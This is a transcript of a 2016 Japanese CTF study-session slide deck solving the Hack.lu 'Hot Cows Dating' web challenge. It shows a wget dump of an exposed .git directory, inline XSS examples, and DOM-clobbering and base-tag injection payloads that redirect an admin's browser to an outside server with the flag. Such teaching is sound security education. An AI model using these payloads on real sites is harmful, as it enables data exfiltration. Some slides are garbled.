katagaitai勉強会#6 EasyなWeb編 / katagaitaiCTF#6 Web


katagaitai勉強会#6 Web編のスライドです。


Yu Yagihashi

August 13, 2016

Transcript

  1. katagaitai勉強会#6 EasyなWeb編 Presented by @yagihashoo

  2. whoami

  3. #katagaitaiCTF whoami ‣ Yu Yagihashi ‣ https://xss.moe ‣ Twitter @yagihashoo ‣ XSSer

    ‣ Security Assessment ‣ CTF for Beginners
  4. #katagaitaiCTF My books

  5. Target

  6. #katagaitaiCTF Scope ‣ What does “Easy” mean?
 Beginner {here} Intermediate ‣ I hope this event is to be the next step for the beginners ‣

    More deeply, more broadly, more detailed than “CTF for Beginners”
  7. #katagaitaiCTF Mission ‣ Hot Cows Dating (Hack.lu CTF) ‣ Let’s learn the XSS without scripting ‣ There are two ways to solve

    ‣ What’s DOM Clobbering? ‣ What’s Content Security Policy? ‣ Cool one: Golden flag award prized as the most unexpected solution
  8. Reconnaissance

  9. #katagaitaiCTF First of all ‣ Let’s access to the target website ‣ https://goo.gl/qNjMfD (short link; digits may have been lost in extraction) ‣ Because of some technical reasons, you had better access with Chrome

    or Chrome-based browser ‣ In this lecture, I use Google Chrome for example
  10. #katagaitaiCTF Let’s see the features ‣ Create an account and login

  11. #katagaitaiCTF Let’s see the features ‣ Users can chat with some cows…

  12. #katagaitaiCTF Let’s see the features ‣ Users can chat with some cows…

  13. #katagaitaiCTF Let’s see the features ‣ Seems impossible to get the premium account

  14. #katagaitaiCTF Let’s see the features ‣ Another feature for the reporting problem

  15. #katagaitaiCTF Let’s see the features ‣ Another feature for the reporting problem

  16. #katagaitaiCTF Let’s see the features ‣ All features of this site ‣ Cower View: Displays all online cows ‣ Chatting page: Chat with respective cows ‣ Reporting Page: The form to report problems

    ‣ Then, what shall we do? ‣ There should be some vulnerabilities ‣ This site has a XSS ‣ Can you find it out?
  17. )BTIUBHLBUBHBJUBJ$5' "UUFOUJPO ‣ 5IJTTJUFQSPIJCJUTTFOEJOHBSFQPSU DPOTFDVUJWFMZ ‣ 6TFSTDBOTFOEBSFQPSUFWFSZNJOVUFT ‣ 0NJUUJOHEFUBJMT JUDBOCFFWBEFEVTJOH9

    'PSXBSEFE'PSIFBEFS ‣ $POpHVSF#VSQ4VJUFGPSSFXSJUJOHSFRVFTUIFBEFS
  18. )BTIUBHLBUBHBJUBJ$5' "UUFOUJPO ‣ $POpHVSJOH#VSQ1SPYZʜ

  19. )BTIUBHLBUBHBJUBJ$5' "UUFOUJPO ‣ $POpHVSJOH#VSQ1SPYZʜ

  20. )BTIUBHLBUBHBJUBJ$5' "UUFOUJPO ‣ $POpHVSJOH#VSQ1SPYZʜ

  21. #katagaitaiCTF Reporting Page ‣ When seeing the page to send a report to admin, XSSer must think
 “There may be some XSS” ‣ You may say “Why did you know that?”

    ‣ There is no reason. XSS is just there
  22. Where’s the flag?

  23. #katagaitaiCTF Investigation ‣ You have [N] minutes ‣ Find where the flag is ‣ Hint: The source code knows everything ‣ You know many solutions to get the source

    code: RCE, Path traversal, and so on
  24. #katagaitaiCTF Review ‣ What you have to do firstly is gather information ‣ Whois information, DNS records, HTTP headers,

    System error messages, and so on ‣ Sometimes, hidden pages are listed on
 “robots.txt” ‣ It isn’t good to hide something listing on robots.txt ‣ robots.txt is open to everyone on the Internet.
 Of course it’s intended to show that crawlers
  25. #katagaitaiCTF Review ‣ There seems be .git directory

  26. #katagaitaiCTF Review ‣ It’s possible to acquire all source codes…

  27. #katagaitaiCTF How to get the sources ‣ Use wget to download the .git directory ‣ After download it, use git and restore the source codes on the local wget -r

    --no-check-certificate -erobots=off https://wildwildweb.fluxfingers.net:1401/.git/
  28. #katagaitaiCTF How to get the sources ‣ Run `git status` and confirm that the directories properly downloaded

  29. #katagaitaiCTF How to get the sources ‣ Run `git reset --hard` and restore fallen out files

  30. #katagaitaiCTF Get into the source codes ‣ Apart from anything else, look the list of the source codes ‣ Just use `ls -R` or `tree` ‣ Some API scripts are in the “api”

    directory, it’s interesting ‣ There is a config scripts named with “cfg.php”. Let’s begin with this . ├── api │ ├── error.php │ ├── login.php │ ├── logout.php │ ├── premium.php │ ├── register.php │ └── report.php ├── cfg.php ├── css │ └── style.css ├── index.php ├── js │ ├── form.js │ ├── http.js │ ├── loader.js │ ├── pages │ │ ├── chat.js │ │ ├── error.js │ │ ├── index.js │ │ ├── internal.js │ │ ├── logout.js │ │ └── report.js │ ├── router.js │ └── template.js ├── lib │ ├── Template.php │ ├── session.php │ └── util.php ├── robots.txt ├── static │ ├── abbie.jpg │ ├── clara.jpg │ ├── cow_front.jpg │ ├── maggie.jpg │ └── rosie.jpg └── templates ├── cow.html ├── error.html ├── index.html ├── internal.html ├── layout.phtml ├── message.html ├── message.pjson └── report.html
  31. #katagaitaiCTF Check the config ‣ The flag string is defined as a constant ‣ So we need to find where this constant is called in the source codes ‣ It’s simple task, just use grep

    ‣ grep -e FLAG `find . -name '*.php'` 27 // change this 28 define('FLAG', 'XXX'); 29 define('SALT', 'XXX');
  32. #katagaitaiCTF Grep result ‣ The flag is used in premium.php ‣ So get into this file next

  33. #katagaitaiCTF premium.php ‣ This API is called on the chat page ‣ In the later step, getting into the client-side codes

  34. Time to XSS

  35. #katagaitaiCTF Investigation ‣ XSS will be needed to capture the flag ‣ Basically, you have to find the vulnerabilities from scratch in CTF ‣ You have [N] minutes

    ‣ Find useful one
  36. #katagaitaiCTF Review ‣ Could you find good one? ‣ Some tags work on “/?p=chat…s…XSS…s” (URL punctuation lost in extraction) ‣

    However, could you run “alert(‘XSS’)” on this page? ‣ There’s something strange with this site, right?
  37. #katagaitaiCTF Review ‣ Some tags like <s> works well

  38. #katagaitaiCTF Review ‣ However, <script> doesn’t work at all

  39. #katagaitaiCTF Review ‣ Something wrong…

  40. “Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha…'), or a nonce ('nonce-…') is required to enable inline execution.”

  41. “Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha…'), or a nonce ('nonce-…') is required to enable inline execution.” What’s this?

    
  42. Content Security Policy

  43. #katagaitaiCTF What’s the CSP? ‣ New generation web security mechanism ‣ Beyonds the Same Origin Policy ‣ Epoch-making anti-XSS feature on browsers ‣ Restricts loading resources based on whitelist

    ‣ Website informs safe resource with policy directive to browsers ‣ Directives would be written in the format like
 {directive-name} {resource-origins}
  44. #katagaitaiCTF More about CSP ‣ How to use ‣ Content-Security-Policy header ‣ Content-Security-Policy-Report-Only header ‣ Major directives

    (you need to know for CTF) ‣ default-src ‣ script-src ‣ Major resources (you need to know for CTF) ‣ ‘self’ ‣ ‘unsafe-inline’ ‣ ‘unsafe-eval’
  45. #katagaitaiCTF Look again ‣ How’s on the site? Let’s look again

  46. #katagaitaiCTF What CSP did ‣ Let’s look at policies ‣ ‘self’ means the scripts (or something else) originated from the same origin are permitted ‣

    These policies contain no ‘unsafe-inline’ ‣ So browsers don’t execute the codes like below
  Inline scripts: <script>alert(‘this’)</script>
  Event handlers: <img src=x onerror=alert(‘this’)>
  JavaScript scheme: javascript:alert(‘this’) default-src ‘none'; img-src 'self'; script-src ‘self'; style-src ‘self'; connect-src 'self'
  47. #katagaitaiCTF What CSP did ‣ Our XSS code is… ‣ Our XSS code is injected to HTML context ‣ So we have to use inline scripts to execute arbitral codes on the page ‣

    However… ‣ CSP blocks executing inline scripts just like
 “<img src=x onerror=alert(…)>” ‣ I had a talk about CSP, also refer that ‣ http://www.slideshare.net/yagihashoo/cspfxos (slug punctuation lost in extraction)
  48. So, what’s the plan?

  49. #katagaitaiCTF What can I do? ‣ CSP evasion is out of the scope today ‣ It’s too difficult to deal with in short term ‣ The policies on this site has no evident flaw ‣ HTML tag injection is possible even under the

    CSP ‣ Some ordinal HTML tags give us flag today ‣ So today let’s learn not ordinal XSS
  50. #katagaitaiCTF HTML Tag Injection ‣ Generally, it’s used as synonym of XSS ‣ It’s simple, just inject some HTML tags ‣ Today,

    introducing two of good HTML tag injection attack methods ‣ Use them and get the flag
  51. <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>DOM test</title> <script>

    console.log(document.URL); // => http://example.com/~~~ </script> </head> <body> <form name="URL">foo bar</form> <script> console.log(document.URL); // => <form name="URL">foo bar</form> </script> </body> </html> 1st: DOM Clobbering
  52. #katagaitaiCTF What’s DOM Clobbering? ‣ You know DOM is really messed ‣ Not only DOM, but the Web is all messed for long time ‣ There should be solid border between the

    HTML document and the JavaScript code ‣ And it have to be forbidden implicit access to the JavaScript world from HTML world ‣ However, for some reasons, it can happen and lead some attacks to the system. Today let’s use it ‣ DOM Clobbering - The Spanner ‣ http://www.thespanner.co.uk/…/dom-clobbering/ (date path segments lost in extraction)
  53. #katagaitaiCTF What’s DOM Clobbering? ‣ DOM tree is constructed automatically after DOM content loading ‣ When DOM tree is constructed, some form item elements are integrated into DOM tree (means

    generating objects in JavaScript world) ‣ It is based on the “name” or “id” property of the elements ‣ So the elements named or assigned ID exists in JavaScript world from the start
  54. #katagaitaiCTF <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>DOM test</title>

    </head> <body> <form id="here">foo bar</form> <script> console.log(here.innerHTML); // => foo bar </script> </body> </html> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>DOM test</title> </head> <body> <form name="here">foo bar</form> <script> console.log(document.here.innerHTML); // => foo bar </script> </body> </html> What’s DOM Clobbering? ‣ The DOM elements objects are generated automatically ‣ And it can be accessed via JavaScript code ‣ What does this mean?
  55. #katagaitaiCTF What’s DOM Clobbering? ‣ Just like below, overriding to the default objects occurs for document, using this technique <!DOCTYPE html>

    <html lang="en"> <head> <meta charset="UTF-8"> <title>DOM test</title> <script> console.log(document.URL); // => http://example.com/~~~ </script> </head> <body> <form name="URL">foo bar</form> <script> console.log(document.URL); // => <form name="URL">foo bar</form> </script> </body> </html> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>DOM test</title> <script> var AAA = "global obj"; console.log(AAA); // => global obj </script> </head> <body> <form id="AAA">foo bar</form> <script> console.log(AAA); // => global obj </script> </body> </html>
  56. #katagaitaiCTF What’s DOM Clobbering? ‣ Overriding document (objects), we can cause an error intentionally ‣ You may think “Is that all?”

    ‣ It’s trivial, however has a big effect for this Hot Cows Dating
  57. <!-- The page is on "http://xss.moe/ base.html" --> <base href=“http://sqli.moe/">

    <a href="foo.html">foo</a> ⇒links to sqli.moe/foo.html <script> location.href=“bar.html" </script> ⇒move to sqli.moe/bar.html 2nd: Base tag injection
  58. #katagaitaiCTF The feature of base tag ‣ Base tag defines the base URI for the relative paths in the page ‣ Effect both tags and codes ‣ Just like below ‣

    Cannot use “javascript:”, and so on (maybe) ‣ So not useful for XSS itself <!-- The page is on "http://xss.moe/base.html" --> <base href=“http://sqli.moe/"> <a href="foo.html">foo</a> ⇒links to sqli.moe/foo.html <script>location.href="bar.html"</script> ⇒move to sqli.moe/bar.html
  59. #katagaitaiCTF What happens? ‣ Information leakage ‣ If the request with url parameter occurs on the page that is injected malicious base tag, those url parameters will be sent to the malicious server
 ‣

    In this example, the link refers malicious domain “xss.moe” ‣ In the result, “some_secret_info” parameter leaks out to the another server ‣ Referers too ‣ In the some situations, http referer info will also leak <base href=“http://xss.moe/this_is_injected/”> <a href="foo.php?some_secret_info=XXX">link</a>
  60. Now the time to CTF

  61. #katagaitaiCTF By the way ‣ XSS needs some server to receive the data ‣ Do you have the one assigned global address? ‣ If you not,

    use these sites ‣ Thanks @_NNU_ (handle may have lost digits in extraction)
 http://requestb.in ‣ I made this last night…
 http://katagaitai.sqli.moe
  62. #katagaitaiCTF Exploitation ‣ Use the DOM Clobbering and capture the flag ‣ You have [N] minutes

  63. #katagaitaiCTF Chase the flag ‣ Use the developer tools ‣ command + option + I ‣ ctrl +

    shift + I ‣ All web accesses are listed on Network tab ‣ “/api/premium.php” is the one we just saw beforehand
  64. #katagaitaiCTF Chase the flag ‣ Let’s find the code to issue the request to premium.php ‣ Open the Source tab and browse
 js/pages/chat.js ‣ Find a phrase “premium.php”

    ‣ It’s at line [N] ‣ It’s called in page.getPremium method ‣ So the next is this method
  65. #katagaitaiCTF Chase the flag ‣ The result of page.getPremium() is stored in page.firstMessage function at line [N] ‣ And, it’s divided and stored to another variables immediately

    ‣ Finally flag is in premium_id ‣ What is premium_id used for? premium = page.getPremium(); has_premium = premium[‘success’]; premium_id = premium[‘message’];
  66. #katagaitaiCTF Chase the flag ‣ Find a phrase “premium_id” ‣ It’s at line [N] ‣ This message variable is used for `temp.assign(… message … ‘msg’ …)` (punctuation lost in extraction)

    ‣ What’s temp? ‣ And you notice `var` keyword is not use at all in this code message = cow_name + ((has_premium) ? ' (' + premium_id + ')' : ‘');
  67. #katagaitaiCTF Chase the flag ‣ temp is everywhere in this code ‣ This is global variable, so all functions can override this variable ‣ And it remains having previous value before override

    in each method ‣ Moreover, this object has the method named “assign” ‣ If this “temp” variable is location object…
  68. #katagaitaiCTF Chase the flag ‣ demo

  69. #katagaitaiCTF Chase the flag ‣ demo

  70. #katagaitaiCTF Chase the flag ‣ demo

  71. #katagaitaiCTF Chase the flag ‣ demo

  72. #katagaitaiCTF Chase the flag ‣ The flag is displayed on the chatting page if the user is premium account ‣ premium.php returns the flag if the user is premium account ‣ JavaScript codes on the chatting page displays the

    value premium.php returns on the page ‣ So use the XSS on the chatting page, we can acquire the flag
  73. #katagaitaiCTF Think about scenario ‣ There is XSS on the chatting page ‣ The parameter means destination is vulnerable ‣ The site have a reporting page and the admin may see the reports ‣

    And admin may have a conversation with the reporter using the chatting page ‣ So admin type into the reporter name to the chatting page ‣ It fires our XSS codes
  74. #katagaitaiCTF Think about scenario (diagram labels:) Cow Name: some xss codes / Description: hogehogehoge / ADMIN / XSS
 [Japanese label lost in extraction] / FLAG / My Server

  75. #katagaitaiCTF Let’s clobber DOM ‣ Watch the “temp” variable and confirm that its value ‣ Set the breakpoint ‣ Click the line number at line [N]:
 page.chatAnswer = ……

    ‣ Use the Watch feature on the right side ‣ Click “+” sign ‣ Enter “temp” ‣ Reload
  76. #katagaitaiCTF Let’s clobber DOM ‣ Firstly, “temp” variable points location object ‣ Continuously step into the next function call ‣ It changes from location object into Template object in page.view function at line [N]

    ‣ The next function call is for page.firstMessage which has code displays the flag on the page ‣ Of course the function doesn’t redefines “temp” temp = new Template('message.html');
  77. #katagaitaiCTF Let’s clobber DOM ‣ Do you remember what DOM clobbering can do? ‣ Override document, and cause some error ‣

    If the code calls document.* method before “temp” variable is overridden to Template object… ‣ If it occurs in page.view function, temp remains being location object in page.firstMessage function ‣ And location.assign will be called with the flag
  78. #katagaitaiCTF Let’s clobber DOM ‣ document.getElementById is called at line [N] before “temp” variable is overridden ‣ It’s awesome, we can clobber document.getElementById and cause error ‣

    After error occurs, the rest of codes in page.view function is not executed ‣ Skipping some codes, page.firstMessage will be called
  79. #katagaitaiCTF Let’s clobber DOM ‣ Let’s prove the concept works well ‣ Set the breakpoint at line [N] ‣ Access to “/?p=chat… <form name=getElementById></form>” (URL punctuation lost in extraction)

    ‣ Step into next function call from the break point ‣ An error occurs at line [N] ‣ To resume script execution, you are at
 “<form name=getElementById></form>” at the end btn_logout = document.getElementById('btn-logout');
  80. #katagaitaiCTF Finally ‣ It’s proved that location.assign is called with location.hash.slice(1) ‣ So using the location hash like below will redirects browser to xss.moe

    ‣ http://xss.moe/#<form name=getElementById></form> ‣ So using the location hash like below will redirects admin’s browser to xss.moe with the flag ‣ http://xss.moe/#<form name=getElementById></form>
  81. #katagaitaiCTF Let’s clobber DOM ‣ demo

  82. #katagaitaiCTF Let’s clobber DOM ‣ demo

  83. #katagaitaiCTF Let’s clobber DOM ‣ demo

  84. #katagaitaiCTF Let’s clobber DOM ‣ demo

  85. #katagaitaiCTF Let’s clobber DOM ‣ demo

  86. #katagaitaiCTF Let’s clobber DOM ‣ demo

  87. #katagaitaiCTF Let’s clobber DOM ‣ demo

  88. #katagaitaiCTF Exploitation ‣ Use the base tag injection and capture the flag ‣ Show you this without exercise

  89. #katagaitaiCTF Review ‣ Things to do are same with previous one ‣ Cause an error and make temp remain being location object ‣ In this example, putting to ally CSP

  90. #katagaitaiCTF Review ‣ Skipping all details, just use
 <base href=“http://foo.bar”> ‣ “temp” variable changes from location object into Template object at line [N] ‣

    Now get into Template object temp = new Template('message.html');
  91. #katagaitaiCTF Review ‣ Use Console in developer tools

  92. #katagaitaiCTF Review ‣ The page uses relative path to get template file ‣ So if base tag is injected, we can override request destination ‣

    Remember the CSP policy ‣ It has a rule `connect-src ‘self’` that restricts XHR requests to other origins ‣ If the destination of a request for getting template is other origin, CSP violation occurs and it cause an error
  93. #katagaitaiCTF Review ‣ Whichever URL you use will effect ‣ Because anything but the same origin cause an CSP violation and an error ‣ So using the location hash like below will also redirects admin’s browser to xss.moe with the

    flag ‣ http://xss.moe/#<base href=http://foo.bar>
  94. #katagaitaiCTF Review ‣ demo

  95. #katagaitaiCTF Review ‣ demo

  96. Summary

  97. Any questions?

  98. #katagaitaiCTF Summary ‣ DOM is completely messed up ‣ It’s the charm ‣ Don’t forget to use `var` and `try-catch` ‣ Bad code leads to vulnerabilities

    ‣ Sometimes, the attacking scenario in CTF is really difficult to understand ‣ Imagine
  99. #katagaitaiCTF Acknowledgment ‣ This briefing is based on this writeup ‣ https://github.com/ctfs/write-ups…/tree/master/hack-lu-ctf…/…/hot-cows-dating (digits and hyphens lost in extraction) ‣ Thanks for all attendees ‣

    Thanks for members of katagaitai
  100. Thank you